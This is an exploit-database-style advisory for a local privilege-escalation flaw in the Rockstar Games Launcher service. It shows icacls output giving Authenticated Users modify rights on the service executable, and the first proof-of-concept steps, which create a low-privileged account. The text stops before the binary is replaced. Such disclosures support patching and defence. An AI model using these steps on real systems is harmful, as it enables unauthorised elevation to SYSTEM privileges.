Rockstar service insecure file permissions Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-04-05 |
Type : local |
Platform : windows
This exploit / vulnerability Rockstar service insecure file permissions is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Rockstar Service - Insecure File Permissions
# Date: 2020-04-02
# Exploit Author: George Tsimpidas
# Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher
# Version Patch: 1.0.37.349
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
Vulnerability Description:
RockstarService.exe suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the existing executable file of the service with a binary of his choice. The vulnerability exist due to weak set of permissions being granted to the "Authenticated Users Group" which grants the (M) Flag aka "Modify Privilege"
#PoC
D:\Launcher> icacls .\Launcher.exe
.\Launcher.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
BUILTIN\Users:(I)(RX)
#1. Create low privileged user & Login to that user
C:\>net user lowpriv Password123! /add
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
User name lowpriv
Local Group Memberships *Users
Global Group memberships *None